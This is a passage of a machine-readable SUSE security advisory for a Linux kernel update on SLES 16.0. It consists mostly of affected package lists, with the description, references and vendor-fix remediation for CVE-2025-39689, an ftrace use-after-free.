"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38645"
},
{
"cve": "CVE-2025-39689",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39689"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nftrace: Also allocate and copy hash for reading of filter files\n\nCurrently the reader of set_ftrace_filter and set_ftrace_notrace just adds\nthe pointer to the global tracer hash to its iterator. Unlike the writer\nthat allocates a copy of the hash, the reader keeps the pointer to the\nfilter hashes. This is problematic because this pointer is static across\nfunction calls that release the locks that can update the global tracer\nhashes. This can cause UAF and similar bugs.\n\nAllocate and copy the hash for reading the filter files like it is done\nfor the writers. This not only fixes UAF bugs, but also makes the code a\nbit simpler as it doesn\u0027t have to differentiate when to free the\niterator\u0027s hash between writers and readers.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39689",
"url": "https://www.suse.com/security/cve/CVE-2025-39689"
},
{
"category": "external",
"summary": "SUSE Bug 1249307 for CVE-2025-39689",
"url": "https://bugzilla.suse.com/1249307"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
